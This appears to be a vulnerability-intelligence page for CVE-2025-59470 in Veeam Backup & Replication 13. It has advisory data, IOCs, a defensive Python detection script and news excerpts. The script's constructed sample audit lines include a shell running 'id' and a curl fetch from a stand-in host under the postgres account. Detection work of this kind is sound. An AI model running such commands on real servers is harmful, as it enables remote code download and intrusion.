CVE-2025-59470
Published: 2026-01-08
Priority: P2 (61) · Severity: critical · Score: 9.0 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L
EPSS: 1.49% (70.8th percentile)
This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| veeam | backup_and_recovery | 13.0.0 – 13.0.0 | — |
| veeam | veeam_backup_replication | >= 13.0.0.4967 < 13.0.1.1071 | 13.0.1.1071 |
Detection & IOCs (extracted from sources)
- The flaw affects Veeam Backup & Replication 13.0.1.180 and all earlier version 13 builds; the presence of such a build on a host marks it as a vulnerable target.
- Exploitation requires the attacker to hold the Backup Operator or Tape Operator role; monitor for unexpected assignments of these roles in Veeam.
- Successful exploitation yields code execution as the postgres OS/DB user; alert on unexpected processes or commands spawned by the postgres user on Veeam backup servers.
- The attack vector is a malicious interval or order parameter sent to the Veeam service; inspect API/network traffic to Veeam for anomalous or unsanitized interval/order parameter values.
- Exploitability is limited to authenticated users holding the Backup or Tape Operator role, which Veeam considers highly privileged; unauthenticated exploitation is not possible.
- Following Veeam's recommended Security Guidelines reduces exploitability; patched version 13.0.1.1071 (released January 6) fully remediates the vulnerability.
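Three of the checks in the IOC list above, written out as an added example (this is not Veeam's code and not taken from any of the cited sources): a build-number comparison against the fixed build 13.0.1.1071, a diff of role snapshots that flags new Backup Operator or Tape Operator grants, and a scan of process-audit lines for binaries run as the postgres account. The `user=... exe=... cmd="..."` audit-line format, the allow-list of binaries postgres is expected to run, the dictionary shape of the role snapshots and all sample inputs are assumptions constructed for the example; map them onto your own telemetry and baseline the allow-list on a known-good server before relying on it.

```python
"""Added example, not Veeam's code: three checks derived from the IOC list above.

Assumptions (not taken from the page): the build string format '13.0.1.180',
the key=value process-audit line format, the allow-list of binaries the
postgres account is expected to run, and the role-snapshot shape.
"""
from __future__ import annotations

import re

# From the advisory data on this page: fixed in 13.0.1.1071, only 13.x affected.
FIXED_BUILD = (13, 0, 1, 1071)
AFFECTED_MAJOR = 13
# Roles the advisory says an attacker must hold.
PRIVILEGED_ROLES = {"Backup Operator", "Tape Operator"}
# Assumption: binaries the postgres OS user legitimately runs on a backup server.
# Baseline this against your own host before trusting it.
EXPECTED_POSTGRES_EXES = {"postgres", "postmaster", "pg_ctl"}
# Assumption: audit lines carry 'user=... exe=... cmd="..."' fields (constructed format).
AUDIT_RE = re.compile(r'user=(?P<user>\S+)\s+exe=(?P<exe>\S+)(?:\s+cmd="(?P<cmd>[^"]*)")?')


def parse_build(build: str) -> tuple[int, ...]:
    """'13.0.1.180' -> (13, 0, 1, 180); reject anything that is not dotted integers."""
    parts = build.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Veeam build string: {build!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable_build(build: str) -> bool:
    """True for any version-13 build older than the fixed build.

    Conservative on purpose: the affected table starts at 13.0.0.4967, but the
    vendor statement covers 13.0.1.180 'and all earlier version 13 builds', so
    every pre-fix 13.x build is flagged for patching.
    """
    v = parse_build(build)[:4]
    if v[0] != AFFECTED_MAJOR:
        return False
    v = v + (0,) * (4 - len(v))      # treat '13.0.1' as 13.0.1.0
    return v < FIXED_BUILD


def new_privileged_assignments(before: dict[str, set[str]],
                               after: dict[str, set[str]]) -> list[tuple[str, str]]:
    """(principal, role) pairs that newly hold a role exploitation requires.

    'before'/'after' are snapshots of Veeam role membership, e.g. exported on a schedule.
    """
    found = []
    for principal, roles in after.items():
        added = (roles - before.get(principal, set())) & PRIVILEGED_ROLES
        found.extend((principal, r) for r in sorted(added))
    return sorted(found)


def suspicious_postgres_processes(lines: list[str]) -> list[dict[str, str]]:
    """Processes run as 'postgres' whose binary is outside the expected set."""
    hits = []
    for line in lines:
        m = AUDIT_RE.search(line)
        if not m or m.group("user") != "postgres":
            continue
        exe = m.group("exe")
        if exe.rsplit("/", 1)[-1] not in EXPECTED_POSTGRES_EXES:
            hits.append({"exe": exe, "cmd": m.group("cmd") or ""})
    return hits


# Constructed sample input for this example (not real telemetry).
SAMPLE_AUDIT_LINES = [
    '2026-01-09T10:12:03Z host=vbr01 user=postgres exe=/usr/bin/postgres cmd="postgres -D /var/lib/pgsql/data"',
    '2026-01-09T10:12:07Z host=vbr01 user=veeam exe=/usr/bin/python3 cmd="python3 backup_job.py"',
    '2026-01-09T10:13:41Z host=vbr01 user=postgres exe=/bin/sh cmd="sh -c id"',
    '2026-01-09T10:13:42Z host=vbr01 user=postgres exe=/usr/bin/curl cmd="curl http://203.0.113.10/x"',
]
# Constructed role snapshots (role names are Veeam's, the principals are made up).
ROLES_BEFORE = {"alice": {"Backup Administrator"}, "bob": {"Backup Viewer"}}
ROLES_AFTER = {"alice": {"Backup Administrator"},
               "bob": {"Backup Viewer", "Tape Operator"},
               "svc-report": {"Backup Operator"}}


if __name__ == "__main__":
    for b in ("13.0.1.180", "13.0.0.4967", "13.0.1.1071"):
        print(b, "vulnerable" if is_vulnerable_build(b) else "patched")
    print("new privileged role grants:", new_privileged_assignments(ROLES_BEFORE, ROLES_AFTER))
    for hit in suspicious_postgres_processes(SAMPLE_AUDIT_LINES):
        print("ALERT postgres ran", hit["exe"], "->", hit["cmd"])
```

The process check deliberately keys on the binary rather than the command line: a shell or `curl` running under the postgres account is abnormal on a backup server regardless of its arguments, and matching on arguments alone is easy to evade. The role diff is only as good as the snapshot cadence, so export role membership at least as often as you review change tickets.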
No detection rules found.
No public exploits indexed.
Source: BleepingComputer
## New Veeam vulnerabilities expose backup servers to RCE attacks
blogs_bleepingcomputer · 2026-01-07 · CVSS 7.8 · rated HIGH
By Sergiu Gatlan
Veeam released security updates to patch multiple security flaws in its Backup & Replication software, including a critical remote code execution (RCE) vulnerability.
Tracked as CVE-2025-59470, this RCE security flaw affects Veeam Backup & Replication 13.0.1.180 and all earlier version 13 builds.
"This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter," Veeam explained in a Tuesday advisory.
However, the information technology company adjusted its rating to high severity because it can only be exploited by attackers with the Backup or Tape Operator roles.
"The Backup and Tape Operator roles are c
Source: Wiz
## CVE-2025-59470 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 9.0 · rated CRITICAL
### CVE-2025-59470: Veeam Backup & Replication vulnerability analysis and mitigation
Description (source: NVD): This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
- Score: 9 (CNA score 9.0)
- Published: January 8, 2026
- Severity: CRITICAL
- Affected technologies: Veeam Backup & Replication
- Has public exploit: No
- Has CISA KEV exploit: No (KEV release date N/A, KEV due date N/A)
- EPSS: probability 0.2, percentile 37.8 (Wiz's figures; these differ from the EPSS values in the header above)
- Affected packages and libraries: cpe:2.3:a:veeam:veeam_backup_\&_replication
- Sources: Windows, severity CRITICAL, has fix, added Jan 11, 2026; Windows, severity CRITICAL, has fix, added Jan 18, 2026